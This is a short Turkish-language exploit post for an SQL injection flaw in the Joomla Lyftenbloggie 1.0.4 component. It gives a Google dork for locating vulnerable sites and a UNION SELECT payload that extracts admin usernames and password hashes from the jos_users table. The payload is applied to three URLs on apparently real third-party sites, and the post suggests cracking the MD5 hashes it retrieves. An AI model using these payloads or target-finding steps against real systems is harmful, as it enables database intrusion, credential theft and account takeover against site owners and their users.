

The Joomla Lyftenbloggie 1.0.4 SQL Sokuşturma Güvenlik Açığı
-
Risk: Yüksek
Etki: Uzaktan SQL Kod çalıştırarak Admin şifresini ele geçirme : MD5 'i alip decode edebilirsiniz
Google d0rk: inurl:"com_lyftenbloggie" / "Powered by LyftenBloggie"Exploit:
62+union+select+1,concat_ws(0x3a,username,password),3,4,@@version,6,7,8,9,1
0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+jos_user
s--http://demo.lyften.com/index.php?option=com_lyftenbloggie&author=62+uni
on+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--
http://www.elixa.com.au/joomlademo/index.php?option=com_lyftenbloggie&a
uthor=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--
http://evilobi.net/index.php?option=com_lyftenbloggie&author=62+union+s
elect+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1
,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users--